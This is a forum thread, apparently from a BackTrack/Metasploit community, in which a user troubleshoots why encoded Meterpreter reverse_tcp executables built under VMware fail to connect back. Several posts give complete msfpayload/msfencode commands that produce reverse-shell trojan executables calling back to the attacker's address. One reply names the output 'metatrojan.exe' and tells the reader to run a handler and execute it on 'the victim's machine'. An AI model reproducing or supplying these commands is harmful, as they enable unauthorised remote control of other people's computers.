.i'm trieing to look back at the phoenix910 post, it's about encoding the payload ,meterpreter reverse_tcp and executing it on the victime box
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe
.no problem with bt3 and ./msfencode .the output.exe works fine ,and the victim connect back
.but the same output.exe that was encoded on the bt4 pre, same command used, it's not working!
.in the first place i thought it was some problem with the nat or some iptables rulez .but i run packetyzer on the victim box and no packets has been sent, no connection tried
.tried with updated msf but no good.
.the funny part is ,that the old output.exe that was encoded on a bt3 works on the victim box and connect back to bt4pre, with multi/handler started ,with the options set (LHOST=192.168.1.2 LPORT=5555)
.that could be the problem with the encoder or something, maybe ruby lib.s
.is there someone who managed to use ./msfencode successfully, on bt4pre? .to get the working executible file.
.i'll be thankfull for any response ,'cause i tried with the outher encoders supported my msf, but no results
./msfpayload windows/meterpreter/reverse_tcp LHOST=188.8.131.52 LPORT=4444 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /revpayload.exe
.ecsployt thank's for the replay .it's a good combinations, but i still got the same problem .hm not the same exactly 'cause i menaged to encode the working output.exe but after 100 atemps
.useing the very same command on the livecd on the vmware .it's so confusing couse i install the bt from that livecd after the success and when i tried again to make working exe ,no good it's not working .then i tried to boot form livecd again and do the same thing .it's not working !
.i tried so many things .reinstalling ruby framework bt, booting from iso, livecd etc. ( X > output.exe without encoder, nothing)
And all i can make up with is that this is some kind of problem related with wmware. It is little frustrating cause i was working on this for 5days and resolts are 'in most casess encoded output.exe is not working but u can reboot and try again'
.I don't wana be boring, maybe i's time for me to make a new settup on my box, reinstall vmware...
.so if anyone has a extra minut to try... help
I'm not sure what your problem may be. If your thinking about reinstalling bt4pre to a virtual machine, why dont you try virtual box instead. I'm using that, and it's really good. And open source. The added tools install without a problem to bt4pre as well.
Sorry i can't be of more help.
.this is just crazy!!!
.yesterday i remove my destkop distro and install BT-pre on my box .why not, it's a full distro now and i'm spendig so much time on it .everthing works just fine
.i have vmware 6.5.2 now on bt
.6.5.0 was on my last distro
.but, guess what ??
First thing i did was .lunching vmware, install xpsp1 and xpsp2 and boot the bt-pre under vmware .i just couldn't wait to see the line "meterpreter>"
.f*k !!!!!!!! the output.exe encoded on bt4-pre (running under vmware) ,is not working!!! something is wrong here.
.i encode the same one on my desktop bt4-pre ,main distro now (vmware is running on it)
.it's working and i get my daily dose of meterpreter
.well i'm gone try to run those not working exe in the presence of debugger and see what the hell is wrong with them
BT4? Do it like this under root:
./msfpayload windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] R | ./msfencode -e x86/fnstenv_mov -t exe > metatrojan.exe
Run multi/handler, and set payload as windows/meterpreter/reverse_tcp. And then execute the trojan on the victim's machine, it should connect.
.BigMac, _sinner thx for replay
.maybe i wasn't clear enought about my problem .or it sounds confuzing, cause it is
.there is no syntax error, problem .it doesn't really matter what encoder i use,
i know i can choose between the offered ( ./msfencode -l ) ,combination of few too (ecsployt replay)
.i even tried without msfencoder (X >output.exe) .etc
.to be more specific ,there is no problem doing this outside vmware .on the bt4-pre installed on regular box, or boot from livecd on my laptop or other box .the 'output.exe' that has been made outside virtuel environment always works .no problem how it was made (syntax), what encoder do i use or am i sending it directly to (>) or with -o argument
.BUT when i boot BT4-pre under vmware, it doesn't matter if it is installed (on vmware) or i'm just booting it form livecd the 'output.exe' that i made most likely is not going to connect back, the silly part is that i reboot the BT4-pre and do the same thing i did few minutes ago and sometimes ,just sometimes, the new 'output.exe' is connecting back .in most casses is not
.and that's the confuzing part
.i just wanna hear from someone that whenever he made output.exe under vmware, it's always connecting back
Ok, I see what you're saying. I run BT4 under VMware also (XP as host), no problem for me. But I did notice in BT4 you need to assign an IP manually under VMWare... maybe check your ifconfig?
Originally Posted by loop4me